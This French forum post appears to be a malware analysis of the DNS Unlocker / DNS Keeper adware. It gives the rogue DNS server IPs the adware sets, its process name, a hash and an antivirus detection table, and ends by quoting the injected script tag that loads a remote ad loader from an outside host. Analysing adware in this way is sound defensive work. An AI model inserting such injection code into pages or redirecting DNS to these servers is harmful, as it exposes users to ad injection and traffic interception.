DNS Unlocker / Adware/CloudGuard

[Malekal_morte]

DNS Unlocker est une nouvelle variante de CloudScout. Cette menace est un adware ( logiciel publicitaire ) qui va afficher des encarts publicitaires "Ads by DNS Unlocker", c'est donc un moyen pour les auteurs de gagner de l'argent à travers toutes les publicités qui s'affichent. Les symptômes peuvent être très gênants pour les utilisateurs, cela a pour effet de ralentir la navigation WEB, voire ralentir Windows dans son entier.

Normalement cet adware ne vole pas d'identifiants (mot de passe etc) et ne contrôle pas l'ordinateur à distance. La particularité de DNS Unlocker est qu'il modifie la configuration DNS, voici quelques exemples d'adresses IP utilisées par l'adware, principalement des machines israéliennes :

82.163.143.151
82.163.142.153
82.163.142.171
...

199.203.131.145
82.163.143.167

Le programme va aussi lancer le processus "dnsmohawk.exe"



Situé dans le dossier "%PROGRAMFILES%\DNS Unlocker\"



Les manipulations DNS sont très sensibles car elles peuvent permettre d'intercepter le traffic pour mener des attaques ciblées dites "Man In The Middle" (MITM) et donc éventuellement de récupérer des valeurs dans des formulaires, des identifiants, des données personnelles,etc


Supprimer DNS Unlocker

Reportez-vous à la page du site SUPPRIMER-VIRUS.COM : Supprimer DNS Unlocker

[Malekal_morte]

La même, avec DNS Keeper.
Exactement le même programme sous un nom différent de DNS Unlocker.

DNS sur la même range d'IP :

82.163.143.155
82.163.142.157

Le but est de proposer un programme qui bypass Les filtres DNS qui visent notamment les sites de Torrent.



Ce dernier est détecté en Adware/CloudGuard :

SHA256: 5b7fddc6709dd7ca9276533cb07c148cc1c754587245fe700adffe52b4f93b8f
Nom du fichier : dnskila.exe
Ratio de détection : 13 / 56
Date d'analyse : 2015-09-02 07:20:23 UTC (il y a 0 minute)

Antivirus Résultat Mise à jour
AVG Downloader.TMZ 20150901
Avira ADWARE/CloudGuard.628224.1 20150902
Baidu-International Adware.MSIL.CloudGuard.A 20150901
Cyren W32/GenPua.1261E6D8!Olympus 20150902
ESET-NOD32 a variant of MSIL/Adware.CloudGuard.A 20150902
Fortinet Adware/CloudGuard 20150902
Jiangmin AdWare/MSIL.juu 20150901
Kaspersky not-a-virus:AdWare.MSIL.CloudScout.bi 20150902
Malwarebytes PUP.Optional.DNSUnlocker 20150902
Panda Generic Suspicious 20150901
Qihoo-360 HEUR/QVM03.0.Malware.Gen 20150902
Sophos CloudGuard (PUA) 20150901
Tencent Msil.Adware.Cloudguard.Dvzl 20150902

Dans les pages, l'appel effectuées pour injecter les publicités :

Code : Tout sélectionner

<body id="phpbb" class="section-index ltr"><script charset="UTF-8"> var __f9360353B794A39EE9AF24B72447657EE=__f9360353B794A39EE9AF24B72447657EE || {}; __f9360353B794A39EE9AF24B72447657EE.uid = "{DB62F5D7-0B23-455D-901F-5D5BA5554F6C-2015_09_02}"; __f9360353B794A39EE9AF24B72447657EE.suni="0"; __f9360353B794A39EE9AF24B72447657EE.dsr="none"; __f9360353B794A39EE9AF24B72447657EE.pgd="none"; __f9360353B794A39EE9AF24B72447657EE.tt = "15_09_02"; </script><script type="text/javascript" src="http://kle.austries.com/amm/rapps/121/10100019/loader.js" id="__amm_01" charset="UTF-8"></script>